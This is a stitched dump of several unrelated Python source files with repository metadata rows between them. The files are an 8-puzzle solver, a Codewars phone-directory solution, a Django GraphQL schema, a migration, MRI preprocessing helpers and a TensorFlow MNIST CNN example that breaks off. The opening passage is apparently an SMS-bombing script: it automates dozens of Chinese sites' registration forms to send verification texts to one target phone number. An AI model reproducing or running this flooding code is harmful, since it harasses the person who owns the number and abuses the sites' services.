time.sleep(1)
browser.find_element_by_xpath('//*[@id="sendsms-for-regiter"]').click()
browser.quit()
# 97格格
def func9(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.97gg.net/Account/Register')
browser.find_element_by_xpath('//*[@id="phoneRegistTab"]/tab').click()
browser.find_element_by_xpath('//*[@id="UserName"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="Password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="ConfirmPassword"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="chkCodeSendBtn"]').click()
browser.quit()
# 千米
def func10(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.1000.com/reg?us=3W-head')
browser.find_element_by_xpath('//*[@id="react-content"]/div/div/div/div[2]/form/div[2]/div[2]/div/div/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="send_code"]').click()
browser.quit()
# 唯品会
def func11(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.vip.com/register')
browser.find_element_by_xpath('//*[@id="J_mobile_name"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="J_mobile_verifycode_btn"]').click()
browser.quit()
# 嗨厨房
def func12(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://m.haichufang.com/reg.html')
browser.find_element_by_xpath('//*[@id="login"]/div[2]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="login"]/div[2]/div[2]/div[1]').click()
browser.quit()
# 好美家
def func13(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.jaja123.com/web/register')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[2]/div[1]/input').send_keys(u'张飞')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[3]/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[4]/div[1]/input').send_keys('pwd123456')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[5]/div[1]/input').send_keys('pwd123456')
browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[6]/div[1]/div/span/button').click()
browser.quit()
# 小米
def func14(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://cn.account.xiaomi.com/pass/register?_locale=zh_CN')
browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[3]/div[2]/label/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[6]/input').click()
browser.quit()
# 巨人网络
def func15(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://reg.ztgame.com/')
browser.find_element_by_xpath('//*[@id="reg_form"]/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="reg_form"]/div[2]/input[2]').click()
browser.quit()
# 微盟
def func16(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://account.weimob.com/register')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="signUpForm"]/div[3]/a').click()
browser.quit()
# 商品宅配
def func17(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.homekoo.com/zhixiao/cuxiao/index.php')
browser.find_element_by_xpath('//*[@id="username5"]').send_keys(u'张飞')
browser.find_element_by_xpath('//*[@id="tel5"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="submit_img5"]').click()
browser.quit()
# 快乐购
def func18(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.happigo.com/register/')
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="send_auth_code"]').click()
browser.quit()
# 手机中国
def func19(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://passport.cnmo.com/register/')
browser.find_element_by_xpath('//*[@id="m_mobile"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="m_uname"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="m_password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="m_confirm"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="m_getcode"]').click()
browser.quit()
# 苏宁
def func20(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://reg.suning.com/person.do')
browser.find_element_by_xpath('//*[@id="mobileAlias"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendSmsCode"]').click()
browser.quit()
# 爱奇艺
def func21(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://www.iqiyi.com/iframe/loginreg?is_reg=1&')
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[2]/i').click()
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[1]/div[2]/input').send_keys(self.phone)
browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/a[2]').click()
browser.quit()
def func22(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.facebank.cn/user.html')
# browser.switch_to.alert()
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="getSmsCode"]').click()
time.sleep(1)
browser.quit()
# 支付宝
def func23(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://memberprod.alipay.com/account/reg/index.htm')
# 焦点问题未解决,支付宝接口无效
browser.quit()
# 粉笔网
def func24(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://fenbi.com/web/signup')
# 弹窗问题,接口无效
browser.quit()
def func25(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://jrh.financeun.com/Login/jrwLogin?web=jrw')
browser.find_element_by_xpath('//*[@id="login-segment-phoneLogin"]').click()
browser.find_element_by_xpath('//*[@id="quickMobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="quickSendMsgCode"]').click()
browser.quit()
def func26(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.maifupay.com/register')
browser.find_element_by_xpath('/html/body/div[2]/div/div[1]/form/div[1]/input').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendVerifySmsButton"]').click()
browser.quit()
def func27(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://passport.ingping.com/reg/index?retUrl=https%3A%2F%2Fwww.ingping.com&fxPid=')
browser.find_element_by_xpath('//*[@id="phoneNum"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="sendRegMsgA"]').click()
browser.quit()
def func28(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.decathlon.com.cn/zh/create')
browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="login-button"]').click()
time.sleep(1)
browser.quit()
# 迅雷
def func29(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://vip.xunlei.com/?referfrom=v_pc_qtcp_ggong_xlhy')
# 类似支付宝页面无法解决焦点问题,猜测用JS解决
browser.quit()
def func30(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://my.ruanmei.com/?page=register')
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="sendsms"]').click()
browser.quit()
def func31(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://www.juhe.cn/register')
browser.find_element_by_xpath('//*[@id="username"]').send_keys('helloworld998')
browser.find_element_by_xpath('//*[@id="password"]').send_keys('pwd123456')
browser.find_element_by_xpath('//*[@id="mobilephone"]').send_keys(self.phone)
browser.find_element_by_xpath('//*[@id="reg_smsbtn"]').click()
time.sleep(1)
browser.quit()
def func32(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('http://passport.zongheng.com/webreg?location=http%3A%2F%2Fwww.zongheng.com%2F')
browser.find_element_by_xpath('//*[@id="regphone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('/html/body/div[3]/div[2]/p[3]/span').click()
browser.quit()
def func33(self):
browser = webdriver.Firefox(firefox_options=self.options)
browser.implicitly_wait(8)
browser.get('https://wap.51kid.com/a/free-lesson')
browser.find_element_by_xpath('//*[@id="wechat"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone)
time.sleep(1)
browser.find_element_by_xpath('//*[@id="apply"]/div[3]/div').click()
browser.quit()
|
[
"[email protected]"
] | |
e4d683794d458ed13eab1f94478c4c152a35abfa
|
c885656dc11b4a0becd6bee5ada7ebb7927d090f
|
/Fundamentals/phone_directory.py
|
5eac7c1f4309d7c64a31b0353cf36690f4ef2652
|
[] |
no_license
|
nlpet/codewars
|
804da896cd608ae842442098383a8685a809158c
|
b53a2006a499350d846524f45966dafef035cd71
|
refs/heads/master
| 2021-06-24T08:55:31.663474 | 2017-07-19T11:09:12 | 2017-07-19T11:09:12 | 83,186,729 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,565 |
py
|
r"""
Phone directory problem on codewars.
John keeps a backup of his old personal phone book as a text file. On each line
of the file he can find the phone number (formatted as +X-abc-def-ghij where X stands
for one or two digits), the corresponding name between < and > and the address.
Unfortunately everything is mixed, things are not always in the same order,
lines are cluttered with non-alpha-numeric characters.
Examples of John's phone book lines:
"/+1-541-754-3010 156 Alphand_St. <J Steeve>\n"
" 133, Green, Rd. <E Kustur> NY-56423 ;+1-541-914-3010!\n"
"<Anastasia> +48-421-674-8974 Via Quirinal Roma\n"
Could you help John with a program that, given the lines of his phone book and a phone
number, returns a string for this number: "Phone => num, Name => name, Address => address"
Examples:
s = "/+1-541-754-3010 156 Alphand_St. <J Steeve>\n 133, Green,
Rd. <E Kustur> NY-56423 ;+1-541-914-3010!\n"
phone(s, "1-541-754-3010") should return "Phone => 1-541-754-3010,
Name => J Steeve, Address => 156 Alphand St."
It can happen that, for a few phone numbers, there are many people
for a phone number - say nb - in which case
return: "Error => Too many people: nb"
or it can happen that the number nb is not in the phone book, in that case
return: "Error => Not found: nb"
"""
import re
import sys
sys.path.append('..')
from helpers.test_wrapper import Test
def phone(strng, num):
match_phone = re.findall(num, strng)
found = 0
result = 'Error => Not found: {}'.format(num)
if len(match_phone) == 0:
return result
for line in strng.split('\n'):
match_phone = re.search(num, line)
if match_phone:
name = re.sub(".*<(.*)>.*", "\g<1>", line)
if re.sub(".*<(.*)>.*", "\g<1>", result):
found += 1
clean_line = line.replace(num, '').replace(name, '')
addr = " ".join(re.sub("[^a-zA-Z0-9\.-]", " ", clean_line).split())
result = 'Phone => {}, Name => {}, Address => {}'.format(num, name, addr)
if found > 1:
result = 'Error => Too many people: {}'.format(num)
return result
def run_tests():
with Test() as test:
dr = (
"/+1-541-754-3010 156 Alphand_St. <J Steeve>\n 133, Green, Rd. <E Kustur> NY-56423 ;+1-541-914-3010;\n"
"+1-541-984-3012 <P Reed> /PO Box 530; Pollocksville, NC-28573\n :+1-321-512-2222 <Paul Dive> Sequoia Alley PQ-67209\n"
"+1-741-984-3090 <Peter Reedgrave> _Chicago\n :+1-921-333-2222 <Anna Stevens> Haramburu_Street AA-67209\n"
"+1-111-544-8973 <Peter Pan> LA\n +1-921-512-2222 <Wilfrid Stevens> Wild Street AA-67209\n"
"<Peter Gone> LA ?+1-121-544-8974 \n <R Steell> Quora Street AB-47209 +1-481-512-2222!\n"
"<Arthur Clarke> San Antonio $+1-121-504-8974 TT-45120\n <Ray Chandler> Teliman Pk. !+1-681-512-2222! AB-47209,\n"
"<Sophia Loren> +1-421-674-8974 Bern TP-46017\n <Peter O'Brien> High Street +1-908-512-2222; CC-47209\n"
"<Anastasia> +48-421-674-8974 Via Quirinal Roma\n <P Salinger> Main Street, +1-098-512-2222, Denver\n"
"<C Powel> *+19-421-674-8974 Chateau des Fosses Strasbourg F-68000\n <Bernard Deltheil> +1-498-512-2222; Mount Av. Eldorado\n"
"+1-099-500-8000 <Peter Crush> Labrador Bd.\n +1-931-512-4855 <William Saurin> Bison Street CQ-23071\n"
"<P Salinge> Main Street, +1-098-512-2222, Denve\n"
)
def testing(actual, expected):
test.assert_equals(actual, expected)
test.describe("phone")
test.it("Basic tests")
testing(phone(dr, "48-421-674-8974"), "Phone => 48-421-674-8974, Name => Anastasia, Address => Via Quirinal Roma")
testing(phone(dr, "1-921-512-2222"), "Phone => 1-921-512-2222, Name => Wilfrid Stevens, Address => Wild Street AA-67209")
testing(phone(dr, "1-908-512-2222"), "Phone => 1-908-512-2222, Name => Peter O'Brien, Address => High Street CC-47209")
testing(phone(dr, "1-541-754-3010"), "Phone => 1-541-754-3010, Name => J Steeve, Address => 156 Alphand St.")
testing(phone(dr, "1-121-504-8974"), "Phone => 1-121-504-8974, Name => Arthur Clarke, Address => San Antonio TT-45120")
testing(phone(dr, "1-498-512-2222"), "Phone => 1-498-512-2222, Name => Bernard Deltheil, Address => Mount Av. Eldorado")
testing(phone(dr, "1-098-512-2222"), "Error => Too many people: 1-098-512-2222")
testing(phone(dr, "5-555-555-5555"), "Error => Not found: 5-555-555-5555")
if __name__ == '__main__':
run_tests()
|
[
"[email protected]"
] | |
adc3b4f80abdaf533b97d9b62f5538e55b5a821b
|
9b90373955433cdfa8806373ff343a471a1adcc1
|
/src/algorithms/07-eight-puzzle-game/puzzle.py
|
588dfe7e1d947e7edea11228791b0e78357e64c7
|
[
"MIT"
] |
permissive
|
SamVanhoutte/python-musings
|
0a69f44dc8321792df2a6f57c5821ed52784dcf6
|
18e9b6b366af6c072a5d928f95f30ea88f01f540
|
refs/heads/master
| 2021-07-25T18:39:59.328235 | 2020-05-18T06:41:08 | 2020-05-18T06:41:08 | 171,827,369 | 0 | 0 |
MIT
| 2019-12-24T09:05:16 | 2019-02-21T08:03:45 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 5,387 |
py
|
from random import shuffle, choice
import numpy as np
import math
class Puzzle:
board = [[]]
depth = 0
_goal = [[1, 2, 3],[4, 0, 5], [6, 7, 8]]
def __init__(self, signature:str = None):
if(signature!=None):
self.board = np.zeros((3, 3), int)
seq = 0
for row in range(0, 3):
for col in range(0, 3):
self.board[row][col] = 0 if signature[seq]==' ' else signature[seq]
seq += 1
else:
#print('Making 200 random moves from the goal state back')
            # start from the goal and make 200 random moves back from it
self.board = np.copy(self._goal)
for _ in range(200) :
move = choice(self.get_available_moves())
self.move_cell(move[0], move[1])
def set_state(self, board):
self.board = board
def __str__(self):
hor_line = '---------------\n'
result = ''
for row in self.board:
for cell in row:
if (cell!=0):
result += '| ' + str(cell) + ' |'
else:
result += '| |'
result += '\n'
return result
def get_open_cell(self):
for row in range(0, 3):
for col in range(0, 3):
if(self.board[row][col]==0):
return row, col
def get_signature(self):
# return unique string to check if state has been used already
result = ''
for row in self.board:
for cell in row:
result += str(cell) if cell != 0 else ' '
return result + ':' + str(self.depth)
def get_available_moves(self):
open_row, open_col = self.get_open_cell()
available_moves = list()
# check horizontal moves
if(open_col-1) >= 0:
available_moves.append((open_row, open_col - 1))
if(open_col+1) < 3:
available_moves.append((open_row, open_col + 1))
# check vertical moves
if(open_row-1) >= 0:
available_moves.append((open_row - 1, open_col))
if(open_row+1) < 3:
available_moves.append((open_row + 1, open_col))
return available_moves
def completed(self):
return (np.array(self.board) == np.array(self._goal)).all()
def move_cell(self,row:int, col:int):
# check if move is valid
open_row, open_col = self.get_open_cell()
self.board[open_row][open_col] = self.board[row][col]
self.board[row][col] = 0
def clone(self):
cloned_puzzle = Puzzle()
cloned_puzzle.set_state(np.copy(self.board))
cloned_puzzle.depth = self.depth
return cloned_puzzle
def evaluate(self, evaluation_method: str = 'fair'):
if(evaluation_method=='good'):
return self._evaluate_nilsson_sequence()
elif(evaluation_method=='fair'):
return self._evaluate_manhattan()
elif(evaluation_method=='weak'):
return self._evaluate_hamming()
elif(evaluation_method=='bad'):
return self._evaluate_opposites()
def _evaluate_manhattan(self):
sum = 0
for row in range(0, 3):
for col in range(0, 3):
tile = self.board[row][col]
if(tile>0):
for m in range(0, 3):
for n in range(0, 3):
if tile == self._goal[m][n]:
sum += abs(row-m) + abs(col-n)
return sum
def _evaluate_nilsson_sequence(self):
# inspired by the answer here: https://cs.stackexchange.com/questions/1904/nilssons-sequence-score-for-8-puzzle-problem-in-a-algorithm?rq=1
# if the empty box is not in the middle, start with cost 1
total_score = 0 if self.board[1][1]==0 else 1
# add manhattan distance cost
distance_cost = self._evaluate_manhattan()
# successors
successor_cost = 0
goal_pairs = list([[1,2],[2,3],[3,5],[5,8],[8,7],[7,6],[6,4],[4,1]])
if([self.board[0][0],self.board[0][1]] not in goal_pairs): successor_cost+=1
if([self.board[0][1],self.board[0][2]] not in goal_pairs): successor_cost+=1
if([self.board[0][2],self.board[1][2]] not in goal_pairs): successor_cost+=1
if([self.board[1][2],self.board[2][2]] not in goal_pairs): successor_cost+=1
if([self.board[2][2],self.board[2][1]] not in goal_pairs): successor_cost+=1
if([self.board[2][1],self.board[2][0]] not in goal_pairs): successor_cost+=1
if([self.board[2][0],self.board[1][0]] not in goal_pairs): successor_cost+=1
return distance_cost + 3 * (total_score + 2*successor_cost)
def _evaluate_hamming(self):
sum = 0
for row in range(0, 3):
for col in range(0, 3):
tile = self.board[row][col]
if(tile!=self._goal[row][col]):
sum += 1
return sum
def _evaluate_opposites(self):
sum = 0
sum += abs(self.board[0][0] - self.board[2][2])
sum += abs(self.board[0][1] - self.board[2][1])
sum += abs(self.board[0][2] - self.board[2][0])
sum += abs(self.board[1][0] - self.board[1][2])
return abs(16-sum)
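# Illustrative usage (added for this write-up, not part of the original module):
# scramble a board, compare the heuristics defined above, and apply one legal move.
if __name__ == '__main__':
    p = Puzzle()                              # 200 random moves away from the goal
    print(p)
    print('manhattan (fair):', p.evaluate('fair'))
    print('nilsson (good)  :', p.evaluate('good'))
    print('hamming (weak)  :', p.evaluate('weak'))
    row, col = p.get_available_moves()[0]     # slide one neighbouring tile into the gap
    p.move_cell(row, col)
    print('solved?', p.completed())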
|
[
"[email protected]"
] | |
acbabc06e4dc6b096ab6dffc2dd92e71c90c3e59
|
3a08e9facc8df83f8e8eed4859ef59ee5200aa14
|
/rough_trade_calendar/graphql.py
|
f3894ce294cb936586401b752f32f355cd2302b4
|
[
"MIT"
] |
permissive
|
craiga/rough-trade-calendar
|
c7fe9125949a7ff1ac38acf73d51765ffbed8ad4
|
175c61391a50eaa4ada3dbc062158773cf72d9c0
|
refs/heads/main
| 2021-11-11T07:50:02.808052 | 2021-08-11T13:07:16 | 2021-08-11T13:07:16 | 194,937,687 | 1 | 1 |
MIT
| 2021-11-09T08:09:42 | 2019-07-02T21:32:28 |
HTML
|
UTF-8
|
Python
| false | false | 1,875 |
py
|
"""
GraphQL + Relay interface to Rough Trade Calendar data.
"""
import django_filters
import graphene
import graphene.relay
from graphene_django import DjangoObjectType
from graphene_django.filter import DjangoFilterConnectionField
from rough_trade_calendar import models
class CountConnection(graphene.Connection):
"""A connection which supports Relay's totalCount field."""
total_count = graphene.Int()
def resolve_total_count(self, *args): # pylint: disable=unused-argument
return self.length # pylint: disable=no-member
class Meta:
abstract = True
class EventFilterSet(django_filters.FilterSet):
"""Filter and order events by start_at."""
start_after = django_filters.DateTimeFilter("start_at", "gt")
start_before = django_filters.DateTimeFilter("start_at", "lt")
order_by = django_filters.OrderingFilter(fields={"start_at": "startAt"})
class Meta:
model = models.Event
fields = ["start_after", "start_before"]
class Event(DjangoObjectType):
"""An event."""
class Meta:
model = models.Event
fields = [
"id",
"name",
"description",
"url",
"image_url",
"start_at",
"location",
]
filterset_class = EventFilterSet
interfaces = [graphene.relay.Node]
connection_class = CountConnection
class Location(DjangoObjectType):
"""A location."""
class Meta:
model = models.Location
fields = ["id", "name", "timezone", "events"]
interfaces = [graphene.relay.Node]
connection_class = CountConnection
filter_fields = {"name": ["exact", "contains"]}
class Query(graphene.ObjectType):
all_locations = DjangoFilterConnectionField(Location, description="All locations.")
schema = graphene.Schema(query=Query)
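# Illustrative usage (not part of the original module): executing a query against the
# schema defined above. Argument and field names are assumptions based on
# graphene-django's default camel-casing of the filter lookups declared on Location.
EXAMPLE_QUERY = """
{
  allLocations(name_Contains: "London") {
    totalCount
    edges { node { name timezone } }
  }
}
"""
# result = schema.execute(EXAMPLE_QUERY)   # requires a configured Django environment
# print(result.data)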
|
[
"[email protected]"
] | |
1a2f1f8498afde855fe2f89df29272d73550da39
|
100d4ef3ac2d288b45430650730eaff1a0e5fb05
|
/Backend/process.py
|
eaf6e61e7206b9b33d40f2d9ed2f7f4695aeb092
|
[] |
no_license
|
billbai0102/SGMT
|
107782b862031deaca1ac91e4b225b9199e4eab2
|
c8303effc8dfada9e5381b09e17e350c5ca8c094
|
refs/heads/main
| 2022-12-26T17:35:57.738188 | 2020-10-07T14:37:38 | 2020-10-07T14:37:38 | 300,917,335 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 399 |
py
|
import cv2
import torch
import numpy as np
def preprocess_mri(image):
image = cv2.resize(image, (256, 256))
image = torch.tensor(image.astype(np.float32))
image = image.unsqueeze(0)
image = image.permute(0, 3, 1, 2)
return image
def postprocess_mask(mask):
mask = mask.detach()
mask = mask.cpu()
    mask = mask.numpy()[0, 0, :, :]  # drop the batch and channel dimensions
return mask
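# Usage sketch (added for illustration): `model` below is an assumed trained
# segmentation network that maps a (1, 3, 256, 256) tensor to a (1, 1, H, W) mask.
if __name__ == '__main__':
    dummy = np.zeros((512, 512, 3), dtype=np.uint8)  # stand-in for a loaded MRI slice
    tensor = preprocess_mri(dummy)
    print(tensor.shape)                              # torch.Size([1, 3, 256, 256])
    # mask = postprocess_mask(model(tensor))         # 2-D numpy array ready for display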
|
[
"[email protected]"
] | |
15959d749cf76018d3d00dfa9cafa9d7699348b9
|
7e820bcff319b61b0905f6839743155a450d3cfb
|
/data/scripts/xyf.py
|
57902dd0f473723f1289508d0ca1306bffb99c78
|
[] |
no_license
|
ShadowLugia650/pokemon-tcg
|
6636a12f15ab5f0fe2b4da85056d844651ec6f33
|
333df6e0303acac361140501b4f98f9c45296435
|
refs/heads/master
| 2022-11-19T23:02:12.657279 | 2020-06-28T04:31:59 | 2020-06-28T04:31:59 | 257,483,793 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 269 |
py
|
from data.scripts._util import check_energy_cost
def scratch(attacker, defender):
check_energy_cost(attacker, 1)
defender.take_damage(10, attacker)
def tailsmack(attacker, defender):
check_energy_cost(attacker, 2)
defender.take_damage(20, attacker)
|
[
"[email protected]"
] | |
a747f23ed4a39749024d5edcb173888590294a8f
|
fc220ec70c38972e97a9b549c14262a5ed1aa6a9
|
/mac/__init__.py
|
8ea3bdb9386d6db6e470175f089de02e8886e1be
|
[] |
no_license
|
adrienpaysant/hashesAndMACs
|
adbb1ab869a4a2d14a002ab8dae340473c33f9af
|
0454ed8499aa82d06ea713c66bc5d58628249264
|
refs/heads/main
| 2023-04-17T05:47:52.372755 | 2021-04-29T13:48:32 | 2021-04-29T13:48:32 | 358,198,378 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 236 |
py
|
from .communication import send_message_digest, get_message_digest, get_message, get_digest, send_message, send_digest
__all__ = [ 'send_message_digest', 'get_message_digest', 'get_message', 'get_digest', 'send_message', 'send_digest']
|
[
"[email protected]"
] | |
1d4206c56fddce6446aff8d1c579022e0ed24186
|
b3a79effcc09df60100dd28d333b60be99ed75a2
|
/app/salaries/migrations/0002_salary.py
|
1601ad14a7d51cdf8bfb44c9de34fd1f64744256
|
[] |
no_license
|
claytonrm/upsalary-django-project
|
b4d4e021b280b72bf50b4d08e77b940787622d74
|
6d9de78c189d78a5ce237062a54256b28b82bd60
|
refs/heads/master
| 2023-08-03T14:42:36.020401 | 2020-07-09T14:37:09 | 2020-07-09T14:37:09 | 265,437,864 | 0 | 0 | null | 2021-09-22T19:02:53 | 2020-05-20T03:19:58 |
Python
|
UTF-8
|
Python
| false | false | 678 |
py
|
# Generated by Django 3.0.6 on 2020-05-20 18:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('salaries', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Salary',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.DecimalField(decimal_places=2, max_digits=19)),
('taxes', models.DecimalField(decimal_places=2, max_digits=19)),
('received_at', models.DateTimeField(editable=False)),
],
),
]
|
[
"[email protected]"
] | |
0efae463197cf4b67c08549dc4459158bc1c5d11
|
a3c7c11c607800155457ea1f886e2d84eadd9610
|
/examples/3_NeuralNetworks/convolutional_network.py
|
17aa1d84f64834e38d5523b130d66d3e697d1ee0
|
[
"MIT"
] |
permissive
|
353622088/CapsNet
|
eddba478143bd092ce27bd49dbb65c63d80824e4
|
04408978dfccd9a6545fc250648fd2f600974a95
|
refs/heads/master
| 2021-08-28T02:22:56.958370 | 2017-12-11T03:03:52 | 2017-12-11T03:03:52 | 112,295,252 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,934 |
py
|
""" Convolutional Neural Network.
Build and train a convolutional neural network with TensorFlow.
This example is using the MNIST database of handwritten digits
(http://yann.lecun.com/exdb/mnist/)
This example is using TensorFlow layers API, see 'convolutional_network_raw'
example for a raw implementation with variables.
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
"""
from __future__ import division, print_function, absolute_import
# Import MNIST data
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("../tmp/data/", one_hot=False)
import tensorflow as tf
# Training Parameters
learning_rate = 0.001
num_steps = 2000
batch_size = 128
# Network Parameters
num_input = 784 # MNIST data input (img shape: 28*28)
num_classes = 10 # MNIST total classes (0-9 digits)
dropout = 0.75 # Dropout, probability to keep units
# Create the neural network
def conv_net(x_dict, n_classes, dropout, reuse, is_training):
# Define a scope for reusing the variables
with tf.variable_scope('ConvNet', reuse=reuse):
# TF Estimator input is a dict, in case of multiple inputs
x = x_dict['images']
# MNIST data input is a 1-D vector of 784 features (28*28 pixels)
# Reshape to match picture format [Height x Width x Channel]
# Tensor input become 4-D: [Batch Size, Height, Width, Channel]
x = tf.reshape(x, shape=[-1, 28, 28, 1])
# Convolution Layer with 32 filters and a kernel size of 5
conv1 = tf.layers.conv2d(x, 32, 5, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv1 = tf.layers.max_pooling2d(conv1, 2, 2)
# Convolution Layer with 64 filters and a kernel size of 3
conv2 = tf.layers.conv2d(conv1, 64, 3, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv2 = tf.layers.max_pooling2d(conv2, 2, 2)
# Flatten the data to a 1-D vector for the fully connected layer
fc1 = tf.contrib.layers.flatten(conv2)
# Fully connected layer (in tf contrib folder for now)
fc1 = tf.layers.dense(fc1, 1024)
# Apply Dropout (if is_training is False, dropout is not applied)
fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)
# Output layer, class prediction
out = tf.layers.dense(fc1, n_classes)
return out
# Define the model function (following TF Estimator Template)
def model_fn(features, labels, mode):
# Build the neural network
    # Because Dropout has different behavior at training and prediction time, we
# need to create 2 distinct computation graphs that still share the same weights.
logits_train = conv_net(features, num_classes, dropout, reuse=False,
is_training=True)
logits_test = conv_net(features, num_classes, dropout, reuse=True,
is_training=False)
# Predictions
pred_classes = tf.argmax(logits_test, axis=1)
pred_probas = tf.nn.softmax(logits_test)
# If prediction mode, early return
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode, predictions=pred_classes)
# Define loss and optimizer
print(logits_train.shape)
print(labels.shape)
loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits_train, labels=tf.cast(labels, dtype=tf.int32)))
# tf.summary.scalar(name='loss', tensor=loss_op)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss_op,
global_step=tf.train.get_global_step())
# Evaluate the accuracy of the model
acc_op = tf.metrics.accuracy(labels=labels, predictions=pred_classes)
# merge_all_op = tf.summary.merge_all()
    # TF Estimators require returning an EstimatorSpec that specifies
# the different ops for training, evaluating, ...
estim_specs = tf.estimator.EstimatorSpec(
mode=mode,
predictions=pred_classes,
loss=loss_op,
train_op=train_op,
eval_metric_ops={'accuracy': acc_op})
return estim_specs
# Build the Estimator
model = tf.estimator.Estimator(model_fn, model_dir='logdir')
# Define the input function for training
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': mnist.train.images}, y=mnist.train.labels,
batch_size=batch_size, num_epochs=None, shuffle=True)
# Train the Model
model.train(input_fn, steps=num_steps)
# Evaluate the Model
# Define the input function for evaluating
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': mnist.test.images}, y=mnist.test.labels,
batch_size=batch_size, shuffle=False)
# Use the Estimator 'evaluate' method
